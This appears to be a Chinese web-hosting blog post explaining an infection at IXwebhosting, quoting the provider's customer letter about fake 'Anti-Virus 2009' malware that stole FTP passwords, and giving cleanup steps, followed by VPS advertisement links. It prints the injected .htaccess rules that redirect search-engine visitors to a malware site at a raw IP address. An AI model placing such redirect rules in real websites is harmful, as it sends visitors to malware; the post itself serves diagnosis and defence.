关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- 便宜 VPS $15 年 1G 内存 10G SSD 2T 流量 1Gb全球[VPS测评]
- 优惠 Digitalvm→日本机房 10G 带宽超多流量 国内连接速度超日本VPS[主机]
- Buyvm - 512M 内存 10G SSD 不限流量 KVM VPS全球[VPS测评]
- 豪情云→14 元 月 1GB 内存 30GB SSD 空间 100GB 虚拟空间(主机)
- 国庆促销 魔方云→美国洛杉矶机房 VPS CN2 GIA 线路 终身 9美国VPS[主机]
- WordPress 后台更新升级出现"您确定要这样做?"的解决办法全球[VPS测评]
- YonZy→66 元 年 512MB 内存 6GB SSD 空间 不限流虚拟空间(主机)
- 数脉科技五一劳动节促销 香港 cn2+bgp 独立服务器 330 元 月独立服务器[U]
- 双十下 ZJI→充值 1000 元送 150 元 香港云地服务器 65 站群服务器[IP]
- Laravel 提示 SQLSTATE[HY000] [1045] Ac全球[VPS测评]
- 八零主机→提供各国独立服务器 CN2 线路 高防服务器 动态 IP 服务独立服务器[U]
- WordPress插件:WP Tabel Tag Gen 不需要手动添加全球[VPS测评]
- WordPress如何手动还原到旧版本全球[VPS测评]
- Poyraz Hosting → 0.8$ 月 土耳其 1C1G15G硬全球[VPS测评]
- Xurver-4.99€ 月 荷兰 1核2G内存30G硬盘 1Gbps不全球[VPS测评]
- DediPath → 1G内存 100G SSD 储存 100Mbps 全球[VPS测评]
- 百看不厌的文案,抖音唯美文案。全球[VPS测评]
- 港网科技怎么样?国内BGP云主机,2核2G5M带宽仅377.46元/年全球[VPS测评]
- 源云主机,香港沙田VPS CN2 1核1G 24/月 NTT 50M 9香港VPS[主机]
- 游戏服务器是什么意思?游戏服务器可以用云服务器吗?全球[VPS测评]
- 遨游主机:8折优惠,美国cn2 gia vps,54元/月,2G内存/1美国VPS[主机]
- 再“掷”53亿元 宜家能否挽回中国消费者全球[VPS测评]
- Linux系统下安装Java JDK全球[VPS测评]
- RAKsmart促销活动:韩国服务器低价抢购,美国G口服务器低至$99,韩国VPS[主机]
- 手帕云,便宜小带宽香港CN2 VPS,集群10G防御,双向CN2直连,仅香港VPS[主机]
- 为什么要拥有一台VPS?全球[VPS测评]
- 又一跨境电商产业园落户!中山石岐签约引进16个项目全球[VPS测评]
- 青云互联:年终特惠香港弹性云服务器15元/月起,可自定义配置,可选winWINDOWS
- 什么是VPS?国内VPS有哪些?全球[VPS测评]
- 野草云:2021开年大促 – 香港VPS 136.8元年起;香港服务器3香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-102690.html











